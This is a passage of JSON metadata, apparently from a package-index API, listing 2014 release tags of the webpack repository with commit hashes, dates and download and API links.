itHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2